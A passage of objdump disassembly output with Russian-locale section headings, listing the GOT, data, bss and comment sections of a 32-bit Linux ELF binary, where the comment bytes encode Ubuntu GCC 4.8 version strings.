 8049fb2:	00 00                	add    %al,(%eax)
 8049fb4:	fe                   	(bad)  
 8049fb5:	ff                   	(bad)  
 8049fb6:	ff 6f a0             	ljmp   *-0x60(%edi)
 8049fb9:	82                   	(bad)  
 8049fba:	04 08                	add    $0x8,%al
 8049fbc:	ff                   	(bad)  
 8049fbd:	ff                   	(bad)  
 8049fbe:	ff 6f 01             	ljmp   *0x1(%edi)
 8049fc1:	00 00                	add    %al,(%eax)
 8049fc3:	00 f0                	add    %dh,%al
 8049fc5:	ff                   	(bad)  
 8049fc6:	ff 6f 94             	ljmp   *-0x6c(%edi)
 8049fc9:	82                   	(bad)  
 8049fca:	04 08                	add    $0x8,%al
	...

Дизассемблирование раздела .got:

08049ffc <.got>:
 8049ffc:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .got.plt:

0804a000 <_GLOBAL_OFFSET_TABLE_>:
 804a000:	14 9f                	adc    $0x9f,%al
 804a002:	04 08                	add    $0x8,%al
	...
 804a00c:	36 83 04 08 46       	addl   $0x46,%ss:(%eax,%ecx,1)
 804a011:	83 04 08 56          	addl   $0x56,(%eax,%ecx,1)
 804a015:	83 04 08 66          	addl   $0x66,(%eax,%ecx,1)
 804a019:	83                   	.byte 0x83
 804a01a:	04 08                	add    $0x8,%al

Дизассемблирование раздела .data:

0804a01c <__data_start>:
 804a01c:	00 00                	add    %al,(%eax)
	...

0804a020 <__dso_handle>:
 804a020:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .bss:

0804a024 <__bss_start>:
 804a024:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .comment:

00000000 <.comment>:
   0:	47                   	inc    %edi
   1:	43                   	inc    %ebx
   2:	43                   	inc    %ebx
   3:	3a 20                	cmp    (%eax),%ah
   5:	28 55 62             	sub    %dl,0x62(%ebp)
   8:	75 6e                	jne    78 <_init-0x8048280>
   a:	74 75                	je     81 <_init-0x8048277>
   c:	20 34 2e             	and    %dh,(%esi,%ebp,1)
   f:	38 2e                	cmp    %ch,(%esi)
  11:	34 2d                	xor    $0x2d,%al
  13:	32 75 62             	xor    0x62(%ebp),%dh
  16:	75 6e                	jne    86 <_init-0x8048272>
  18:	74 75                	je     8f <_init-0x8048269>
  1a:	31 7e 31             	xor    %edi,0x31(%esi)
  1d:	34 2e                	xor    $0x2e,%al
  1f:	30 34 29             	xor    %dh,(%ecx,%ebp,1)
  22:	20 34 2e             	and    %dh,(%esi,%ebp,1)
  25:	38 2e                	cmp    %ch,(%esi)
  27:	34 00                	xor    $0x0,%al
  29:	47                   	inc    %edi
  2a:	43                   	inc    %ebx
  2b:	43                   	inc    %ebx
  2c:	3a 20                	cmp    (%eax),%ah
  2e:	28 55 62             	sub    %dl,0x62(%ebp)
  31:	75 6e                	jne    a1 <_init-0x8048257>
  33:	74 75                	je     aa <_init-0x804824e>
  35:	20 34 2e             	and    %dh,(%esi,%ebp,1)
  38:	38 2e                	cmp    %ch,(%esi)
  3a:	32 2d 31 39 75 62    	xor    0x62753931,%ch
  40:	75 6e                	jne    b0 <_init-0x8048248>
  42:	74 75                	je     b9 <_init-0x804823f>
  44:	31 29                	xor    %ebp,(%ecx)
  46:	20 34 2e             	and    %dh,(%esi,%ebp,1)
  49:	38 2e                	cmp    %ch,(%esi)
  4b:	32 00                	xor    (%eax),%al
